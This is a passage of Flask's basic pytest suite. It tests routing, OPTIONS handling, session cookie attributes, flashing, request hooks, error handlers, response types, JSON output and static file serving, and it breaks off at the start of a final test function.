test_basic.py
import gc
import re
import time
import uuid
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython",
reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
@pytest.mark.parametrize("method", ["get", "post", "put", "delete", "patch"])
def test_method_route(app, client, method):
method_route = getattr(app, method)
client_method = getattr(client, method)
@method_route("/")
def hello():
return "Hello"
assert client_method("/").data == b"Hello"
def test_method_route_no_methods(app):
with pytest.raises(TypeError):
app.get("/", methods=["GET", "POST"])
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
    # Issue 1288: test that automatic OPTIONS handling is not added
    # when a non-uppercase 'options' is listed in methods.
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
@app.route("/clear")
def clear():
flask.session.pop("testing", None)
return "Goodbye World"
rv = client.get("/clear", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "session=;" in cookie
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
    # The with statement is important: otherwise we would leave an
    # exception on the stack, and we want to ensure that this does not
    # negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
    pretty_response = (
        b'{\n  "msg": {\n    "submsg": "W00t"\n  }, \n  "msg2": "foobar"\n}\n'
    )
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
